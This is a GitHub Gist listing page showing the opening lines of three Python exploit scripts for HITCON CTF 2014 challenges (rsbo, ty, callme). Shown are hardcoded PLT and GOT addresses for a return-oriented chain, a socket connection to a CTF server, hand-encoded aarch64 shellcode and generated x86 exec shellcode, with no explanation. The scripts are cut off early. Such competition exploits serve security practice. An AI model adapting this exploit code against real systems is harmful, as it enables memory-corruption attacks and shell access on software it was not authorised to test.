Skip to content

Instantly share code, notes, and snippets.

@g05u
g05u / xpl_rsbo.py
Created Aug 18, 2014
Hitcon-ctf rsbo exploit
View xpl_rsbo.py
#!/usr/bin/env python
from struct import *
from nulllife import *
new_ebp = 0x0804a100
plt_read = 0x080483E0
plt_open = 0x08048420
plt_write = 0x08048450
flag_str = 0x080487D0
@g05u
g05u / xpl_ty_hitcon.py
Created Aug 18, 2014
Exploit ty (aarch64 - arm64) Hitcon-ctf
View xpl_ty_hitcon.py
#!/usr/bin/env python
from struct import *
from nulllife import *
s = NullSocket("210.71.253.109", 9123)
#shell address is 0x411468
shellcode = struct.pack("<I", 0x90000000) #adrp x0, 0x411000
shellcode += struct.pack("<I", 0x91120000) #add x0, x0, #0x480
@g05u
g05u / xpl_callme.py
Last active Aug 29, 2015
Callme hitcon-ctf exploit
View xpl_callme.py
#!/usr/bin/env python
from nulllife import *
import struct
shellcode = NullShell(name = 'exec', arch = 'x86', os = 'linux').get()
stack_chk_got = 0x0804A018
message_data = 0x0804A070